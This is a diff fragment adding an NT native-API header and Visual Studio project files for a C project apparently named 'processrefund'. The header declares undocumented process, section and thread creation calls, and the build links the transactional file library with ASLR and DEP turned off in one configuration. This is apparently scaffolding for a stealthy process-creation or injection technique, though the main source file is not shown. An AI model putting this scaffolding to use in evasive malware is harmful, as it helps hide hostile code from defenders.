+	UNICODE_STRING64 DesktopInfo;
+	UNICODE_STRING64 ShellInfo;
+	UNICODE_STRING64 RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR64 CurrentDirectores[32];
+	ULONG EnvironmentSize;
+} RTL_USER_PROCESS_PARAMETERS64, *PRTL_USER_PROCESS_PARAMETERS64;
+
+
+typedef struct _CURDIR
+{
+	UNICODE_STRING DosPath;
+	HANDLE Handle;
+} CURDIR, *PCURDIR;
+typedef struct _RTL_DRIVE_LETTER_CURDIR
+{
+	USHORT Flags;
+	USHORT Length;
+	ULONG TimeStamp;
+	UNICODE_STRING DosPath;
+} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
+
+typedef struct my_RTL_USER_PROCESS_PARAMETERS
+{
+	ULONG MaximumLength;
+	ULONG Length;
+
+	ULONG Flags;
+	ULONG DebugFlags;
+
+	HANDLE ConsoleHandle;
+	ULONG ConsoleFlags;
+	HANDLE StandardInput;
+	HANDLE StandardOutput;
+	HANDLE StandardError;
+
+	CURDIR CurrentDirectory;
+	UNICODE_STRING DllPath;
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+	PVOID Environment;
+
+	ULONG StartingX;
+	ULONG StartingY;
+	ULONG CountX;
+	ULONG CountY;
+	ULONG CountCharsX;
+	ULONG CountCharsY;
+	ULONG FillAttribute;
+
+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING WindowTitle;
+	UNICODE_STRING DesktopInfo;
+	UNICODE_STRING ShellInfo;
+	UNICODE_STRING RuntimeData;
+	RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
+
+	ULONG_PTR EnvironmentSize;
+	ULONG_PTR EnvironmentVersion;
+	PVOID PackageDependencyData;
+	ULONG ProcessGroupId;
+	ULONG LoaderThreads;
+} my_RTL_USER_PROCESS_PARAMETERS, *my_PRTL_USER_PROCESS_PARAMETERS;
+
+typedef struct _PROCESS_BASIC_INFORMATION64 {
+	NTSTATUS ExitStatus;
+	UINT32 Reserved0;
+	UINT64 PebBaseAddress;
+	UINT64 AffinityMask;
+	UINT32 BasePriority;
+	UINT32 Reserved1;
+	UINT64 UniqueProcessId;
+	UINT64 InheritedFromUniqueProcessId;
+} PROCESS_BASIC_INFORMATION64;
+typedef struct _PEB64
+{
+
+	union
+	{
+		struct
+		{
+			BYTE InheritedAddressSpace;
+			BYTE ReadImageFileExecOptions;
+			BYTE BeingDebugged;
+			BYTE BitField;
+		};
+		DWORD64 dummy01;
+	};
+	DWORD64 Mutant;
+	 DWORD64 ImageBaseAddress;
+	 DWORD64 Ldr;
+	 DWORD64 ProcessParameters;
+	 DWORD64 SubSystemData;
+	 DWORD64 ProcessHeap;
+	 DWORD64 FastPebLock;
+	 DWORD64 AtlThunkSListPtr;
+	 DWORD64 IFEOKey;
+	 DWORD64 CrossProcessFlags;
+	 DWORD64 UserSharedInfoPtr;
+	DWORD SystemReserved;
+	DWORD AtlThunkSListPtr32;
+	 DWORD64 ApiSetMap;
+	 DWORD64 TlsExpansionCounter;
+	 DWORD64 TlsBitmap;
+	DWORD TlsBitmapBits[2];
+	 DWORD64 ReadOnlySharedMemoryBase;
+	 DWORD64 HotpatchInformation;
+	 DWORD64 ReadOnlyStaticServerData;
+	 DWORD64 AnsiCodePageData;
+	 DWORD64 OemCodePageData;
+	 DWORD64 UnicodeCaseTableData;
+	DWORD NumberOfProcessors;
+	union
+	{
+		DWORD NtGlobalFlag;
+		DWORD dummy02;
+	};
+	LARGE_INTEGER CriticalSectionTimeout;
+	 DWORD64 HeapSegmentReserve;
+	 DWORD64 HeapSegmentCommit;
+	 DWORD64 HeapDeCommitTotalFreeThreshold;
+	 DWORD64 HeapDeCommitFreeBlockThreshold;
+	DWORD NumberOfHeaps;
+	DWORD MaximumNumberOfHeaps;
+	 DWORD64 ProcessHeaps;
+	 DWORD64 GdiSharedHandleTable;
+	 DWORD64 ProcessStarterHelper;
+	 DWORD64 GdiDCAttributeList;
+	 DWORD64 LoaderLock;
+	DWORD OSMajorVersion;
+	DWORD OSMinorVersion;
+	WORD OSBuildNumber;
+	WORD OSCSDVersion;
+	DWORD OSPlatformId;
+	DWORD ImageSubsystem;
+	DWORD ImageSubsystemMajorVersion;
+	 DWORD64 ImageSubsystemMinorVersion;
+	 DWORD64 ActiveProcessAffinityMask;
+	 DWORD64 GdiHandleBuffer[30];
+	 DWORD64 PostProcessInitRoutine;
+	 DWORD64 TlsExpansionBitmap;
+	DWORD TlsExpansionBitmapBits[32];
+	 DWORD64 SessionId;
+	ULARGE_INTEGER AppCompatFlags;
+	ULARGE_INTEGER AppCompatFlagsUser;
+	 DWORD64 pShimData;
+	 DWORD64 AppCompatInfo;
+	 struct _UNICODE_STRING_DWORD64 CSDVersion;
+	 DWORD64 ActivationContextData;
+	 DWORD64 ProcessAssemblyStorageMap;
+	 DWORD64 SystemDefaultActivationContextData;
+	 DWORD64 SystemAssemblyStorageMap;
+	 DWORD64 MinimumStackCommit;
+	 DWORD64 FlsCallback;
+	 struct _LIST_ENTRY_DWORD64 FlsListHead;
+	 DWORD64 FlsBitmap;
+	DWORD FlsBitmapBits[4];
+	 DWORD64 FlsHighIndex;
+	 DWORD64 WerRegistrationData;
+	 DWORD64 WerShipAssertPtr;
+	 DWORD64 pContextData;
+	 DWORD64 pImageHeaderHash;
+	 DWORD64 TracingFlags;
+	 DWORD64 CsrServerReadOnlySharedMemoryBase;
+} PEB64;
+
+
+
+
+
+
+typedef
+NTSTATUS(WINAPI *pfnNtWow64QueryInformationProcess64)
+(HANDLE ProcessHandle, UINT32 ProcessInformationClass,
+	PVOID ProcessInformation, UINT32 ProcessInformationLength,
+	UINT32* ReturnLength);
+
+typedef
+NTSTATUS(WINAPI *pfnNtWow64ReadVirtualMemory64)
+(HANDLE ProcessHandle, PVOID64 BaseAddress,
+	PVOID BufferData, UINT64 BufferLength,
+	PUINT64 ReturnLength);
+
+typedef
+NTSTATUS(WINAPI *pfnNtQueryInformationProcess)
+(HANDLE ProcessHandle, ULONG ProcessInformationClass,
+	PVOID ProcessInformation, UINT32 ProcessInformationLength,
+	UINT32* ReturnLength);
+typedef  NTSTATUS(NTAPI *NtResumeThread)(
+	_In_ HANDLE               ThreadHandle,
+	_Out_opt_ PULONG              SuspendCount
+	);
+
+typedef NTSTATUS(NTAPI *my_NtQueryInformationProcess)(
+	IN HANDLE ProcessHandle,
+	IN PROCESSINFOCLASS ProcessInformationClass,
+	OUT PVOID ProcessInformation,
+	IN ULONG ProcessInformationLength,
+	OUT PULONG ReturnLength OPTIONAL
+	);
+typedef NTSTATUS(NTAPI *my_NtWow64QueryInformationProcess64)
+(
+	IN  HANDLE ProcessHandle,
+	IN  ULONG  ProcessInformationClass,
+	OUT PVOID  ProcessInformation64,
+	IN  ULONG  Length,
+	OUT PULONG ReturnLength OPTIONAL
+	);
+
+typedef NTSTATUS(NTAPI *RtlCreateProcessParametersEx)(
+	_Out_ my_PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
+	_In_ PUNICODE_STRING ImagePathName,
+	_In_opt_ PUNICODE_STRING DllPath,
+	_In_opt_ PUNICODE_STRING CurrentDirectory,
+	_In_opt_ PUNICODE_STRING CommandLine,
+	_In_opt_ PVOID Environment,
+	_In_opt_ PUNICODE_STRING WindowTitle,
+	_In_opt_ PUNICODE_STRING DesktopInfo,
+	_In_opt_ PUNICODE_STRING ShellInfo,
+	_In_opt_ PUNICODE_STRING RuntimeData,
+	_In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized
+	);
+
+typedef NTSTATUS(NTAPI *NtCreateThreadEx)(
+	OUT PHANDLE hThread,
+	IN ACCESS_MASK DesiredAccess,
+	IN LPVOID ObjectAttributes,
+	IN HANDLE ProcessHandle,
+	IN LPTHREAD_START_ROUTINE lpStartAddress,
+	IN LPVOID lpParameter,
+	IN BOOL CreateSuspended,
+	IN DWORD StackZeroBits,
+	IN DWORD SizeOfStackCommit,
+	IN DWORD SizeOfStackReserve,
+	OUT LPVOID lpBytesBuffer
+	);
+
+
+typedef NTSTATUS(NTAPI *NtCreateSection)(
+	_Out_    PHANDLE            SectionHandle,
+	_In_     ACCESS_MASK        DesiredAccess,
+	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_opt_ PLARGE_INTEGER     MaximumSize,
+	_In_     ULONG              SectionPageProtection,
+	_In_     ULONG              AllocationAttributes,
+	_In_opt_ HANDLE             FileHandle
+	);
+
+
+typedef NTSTATUS(NTAPI *NtCreateProcessEx)
+(
+	OUT PHANDLE     ProcessHandle,
+	IN ACCESS_MASK  DesiredAccess,
+	IN POBJECT_ATTRIBUTES ObjectAttributes  OPTIONAL,
+	IN HANDLE   ParentProcess,
+	IN ULONG    Flags,
+	IN HANDLE SectionHandle     OPTIONAL,
+	IN HANDLE DebugPort     OPTIONAL,
+	IN HANDLE ExceptionPort     OPTIONAL,
+	IN BOOLEAN  InJob
+	);
+typedef VOID (NTAPI *my_RtlInitUnicodeString)(
+	_Out_    PUNICODE_STRING DestinationString,
+	_In_opt_ PCWSTR          SourceString
+);
+typedef POBJECT_ATTRIBUTES(NTAPI *BaseFormatObjectAttributes)(OUT POBJECT_ATTRIBUTES ObjectAttributes,
+	IN PSECURITY_ATTRIBUTES SecurityAttributes OPTIONAL,
+	IN PUNICODE_STRING ObjectName,
+	OUT PDWORD NumberOfBytes);
+
+//
+// NtCreateProcessEx flags
+//
+#define PS_REQUEST_BREAKAWAY                     1
+#define PS_NO_DEBUG_INHERIT                     2
+#define PS_INHERIT_HANDLES                      4
+#define PS_UNKNOWN_VALUE                        8
+#define PS_ALL_FLAGS PS_REQUEST_BREAKAWAY |PS_NO_DEBUG_INHERIT |PS_INHERIT_HANDLES | PS_UNKNOWN_VALUE
+
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{DA9D5E53-6160-4B44-A770-903C8C4C621D}</ProjectGuid>
+    <RootNamespace>processrefund</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;KtmW32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>false</DataExecutionPrevention>
+      <FullProgramDatabaseFile>true</FullProgramDatabaseFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;ktmw32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ntdefs.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ntdefs.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>